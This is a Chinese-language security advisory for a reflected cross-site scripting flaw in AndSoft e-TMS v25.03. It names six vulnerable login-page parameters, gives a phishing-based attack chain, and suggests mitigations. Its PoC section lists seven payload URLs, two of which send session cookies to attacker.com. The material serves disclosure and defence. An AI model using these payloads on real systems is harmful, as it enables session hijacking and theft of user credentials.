CVE-2025-59758：AndSoft e-TMS反射型跨站脚本漏洞

漏洞信息

漏洞编号

CVE-2025-59758

漏洞类型

反射型跨站脚本（Reflected XSS）

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

AndSoft e-TMS v25.03

漏洞概述

CVE-2025-59758是存在于AndSoft公司开发的e-TMS（运输管理系统）v25.03版本中的一个反射型跨站脚本（Reflected XSS）漏洞。该漏洞由西班牙国家网络安全研究所（INCIBE）于2025年10月2日披露，CVSS 3.1评分为6.1分，属于中危级别漏洞。

AndSoft e-TMS是一款广泛应用于物流和运输行业的运输管理系统，主要用于管理车队、运输订单、物流跟踪等业务。该系统的Web前端存在多个未经过滤的用户输入参数，攻击者可以通过构造包含恶意JavaScript代码的特制URL，诱导受害者点击，从而在受害者的浏览器上下文中执行任意JavaScript代码。

该漏洞的CVSS向量为CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N，表示该漏洞可通过网络进行攻击，攻击复杂度低，无需特殊权限，但需要用户交互（如点击恶意链接）。漏洞的影响范围已发生改变（Scope Changed），对机密性和完整性产生低级别影响，但不影响可用性。由于该漏洞需要用户交互才能触发，因此其危害程度被评定为中危。

成功利用此漏洞的攻击者可以窃取用户的会话Cookie、劫持用户会话、进行钓鱼攻击、篡改页面内容或执行其他恶意操作，对使用e-TMS系统的企业和用户构成安全威胁。

技术细节

该漏洞存在于AndSoft e-TMS v25.03版本的登录页面路径'/clt/LOGINFRM_CYLOG.ASP'中。具体而言，该页面的多个URL参数未对用户输入进行充分的过滤和转义处理，攻击者可以将恶意JavaScript代码注入到这些参数中。

存在漏洞的参数包括：'l'、'demo'、'demo2'、'TNTLOGIN'、'UO'和'SuppConn'共六个参数。这些参数在服务器端处理后直接反映在返回的HTML页面中，没有进行适当的HTML实体编码或JavaScript转义，导致攻击者可以注入任意HTML和JavaScript代码。

漏洞利用方式如下：
1. 攻击者构造一个包含恶意JavaScript代码的特制URL，例如在参数值中插入`<script>alert(document.cookie)</script>`或`<img src=x onerror=alert(1)>`等载荷；
2. 攻击者通过电子邮件、即时消息或其他社交工程手段将此URL发送给目标用户；
3. 受害者点击该恶意链接后，浏览器向e-TMS服务器发送请求；
4. 服务器将包含恶意代码的参数值未经转义地嵌入到返回的HTML响应中；
5. 受害者的浏览器解析该HTML并执行嵌入的恶意JavaScript代码；
6. 恶意代码在受害者的浏览器上下文中执行，可以窃取会话Cookie、修改页面内容或执行其他恶意操作。

由于该漏洞需要用户交互（点击恶意链接）才能触发，且影响范围已改变（Scope Changed），因此CVSS评分为6.1分，属于中危级别。

攻击链分析

STEP 1

步骤1：信息收集

攻击者识别目标组织使用的AndSoft e-TMS v25.03系统，定位登录页面路径'/clt/LOGINFRM_CYLOG.ASP'，确认存在未过滤的参数（l、demo、demo2、TNTLOGIN、UO、SuppConn）。

STEP 2

步骤2：构造恶意URL

攻击者构造包含恶意JavaScript载荷的特制URL，将恶意代码注入到易受攻击的参数中，如使用<script>标签、事件处理器或SVG标签等绕过方式。

STEP 3

步骤3：投递恶意链接

攻击者通过钓鱼邮件、即时消息、社交媒体或其他社交工程手段将恶意URL发送给目标用户，诱骗用户点击。

STEP 4

步骤4：触发漏洞

受害者点击恶意链接后，浏览器向e-TMS服务器发起请求，服务器将未转义的恶意参数值嵌入到返回的HTML响应中。

STEP 5

步骤5：执行恶意代码

受害者的浏览器解析包含恶意代码的HTML响应，在受害者的会话上下文中执行JavaScript代码。

STEP 6

步骤6：数据窃取与权限提升

恶意JavaScript代码可以窃取用户的会话Cookie、劫持用户会话、获取敏感信息，或利用受害者的权限执行进一步的攻击操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-59758 - AndSoft e-TMS Reflected XSS PoC -->
<!-- Vulnerability location: /clt/LOGINFRM_CYLOG.ASP -->
<!-- Vulnerable parameters: l, demo, demo2, TNTLOGIN, UO, SuppConn -->

<!-- PoC 1: Basic XSS via 'l' parameter -->
https://target.com/clt/LOGINFRM_CYLOG.ASP?l=<script>alert('XSS-CVE-2025-59758')</script>

<!-- PoC 2: XSS via 'demo' parameter -->
https://target.com/clt/LOGINFRM_CYLOG.ASP?demo=<script>alert(document.cookie)</script>

<!-- PoC 3: XSS via 'demo2' parameter -->
https://target.com/clt/LOGINFRM_CYLOG.ASP?demo2=<img src=x onerror=alert('XSS')>

<!-- PoC 4: XSS via 'TNTLOGIN' parameter -->
https://target.com/clt/LOGINFRM_CYLOG.ASP?TNTLOGIN="><script>alert(document.domain)</script>

<!-- PoC 5: XSS via 'UO' parameter -->
https://target.com/clt/LOGINFRM_CYLOG.ASP?UO=<svg onload=alert(1)>

<!-- PoC 6: XSS via 'SuppConn' parameter -->
https://target.com/clt/LOGINFRM_CYLOG.ASP?SuppConn=<script>fetch('http://attacker.com/steal?cookie='+document.cookie)</script>

<!-- PoC 7: Multi-parameter XSS (combined exploitation) -->
https://target.com/clt/LOGINFRM_CYLOG.ASP?l=<script>alert(1)</script>&demo=<script>alert(2)</script>&TNTLOGIN=<script>alert(3)</script>

<!-- Cookie stealing PoC (for demonstration purposes only) -->
<!-- https://target.com/clt/LOGINFRM_CYLOG.ASP?l=<script>new Image().src="http://attacker.com/steal?c="+document.cookie</script> -->

影响范围

AndSoft e-TMS v25.03

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1）对访问e-TMS系统的URL进行严格审查，避免点击来源不明的链接；2）在浏览器中启用安全浏览功能；3）部署Web应用防火墙（WAF）规则，拦截包含常见XSS载荷的请求；4）限制对'/clt/LOGINFRM_CYLOG.ASP'页面的访问，仅允许可信IP地址访问；5）定期清理浏览器Cookie，减少会话被劫持的风险；6）监控异常的网络流量和用户行为，及时发现潜在的攻击活动。